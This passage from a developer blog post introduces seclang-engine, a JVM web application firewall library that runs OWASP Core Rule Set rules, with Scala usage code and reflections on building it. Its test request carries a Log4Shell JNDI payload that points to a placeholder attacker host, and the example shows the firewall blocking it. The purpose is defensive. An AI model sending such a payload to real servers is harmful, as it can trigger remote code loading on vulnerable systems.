  • Defines two simple rules: one blocking Firefox browsers and one blocking /admin access

  • Parses the rules using ANTLR under the hood

  • Compiles them into an optimized program

  • Creates an engine instance (thread-safe, can be reused)

  • Evaluates a sample request and checks if it should be blocked

For production use with the OWASP CoreRuleSet, you can use the factory pattern with presets:

import com.cloud.apim.seclang.model._
import com.cloud.apim.seclang.scaladsl.{SecLang, SecLangPresets}

// Create a factory with CRS preset
val factory = SecLang.factory(Map("crs" -> SecLangPresets.coreruleset))

// Get an engine with CRS rules + custom exclusions
val engine = factory.engine(List(
  "@import_preset crs",           // Import all CRS rules
  "SecRuleRemoveById 942100",     // Disable a specific rule
  "SecRuleEngine On"
))

// The factory caches compiled programs, so subsequent calls
// with the same rules return the cached engine instantly

// Test with a malicious request (Log4Shell attack)
val maliciousRequest = RequestContext(
  method = "GET",
  uri = "/api/search",
  headers = Headers(Map(
    "User-Agent" -> List("Mozilla/5.0"),
    "Host" -> List("example.com"),
    "X-Api-Key" -> List("${jndi:ldap://evil.com/exploit}")  // Log4Shell payload
  ))
)

val result = engine.evaluate(maliciousRequest, phases = List(1, 2))

result.disposition match {
  case Disposition.Continue =>
    println("Request allowed")
  case Disposition.Block(status, msg, ruleId) =>
    println(s"Attack blocked! Rule $ruleId: $msg")
    // Output: Attack blocked! Rule 944150: Potential Remote Command Execution: Log4j / Log4shell
}

Open Source

All of this work is open source:

Since seclang-engine is a standalone library with both Java and Scala APIs, you can easily integrate it into any JVM project—whether it's a Jakarta EE application, Spring Boot, Quarkus, or Play Framework. Just add the dependency and start protecting your endpoints.

Conclusion

What started as a Christmas vacation project turned into a comprehensive WAF implementation. The journey taught me:

  1. Don't be intimidated by complexity: That ANTLR grammar turned an "impossible" parser into a weekend project.

  2. Test suites are gold: The CRS tests were invaluable for finding edge cases I never would have imagined.

  3. AI assistance is real: Claude Code helped me tackle the tedious parts (visitor methods, libinjection port) so I could focus on architecture.

  4. Multi-tenancy needs design: Caching and composition aren't afterthoughts—they need to be baked in from the start.

The new WAF is now running in production on Cloud APIM managed Otoroshi instances and on Otoroshi deployments on Clever Cloud. It's faster, more memory-efficient, and far more flexible than our WASM-based solution.

If you're interested in using seclang-engine in your own JVM projects, check out the repositories above. And if you have questions or want to contribute, feel free to open issues or PRs!
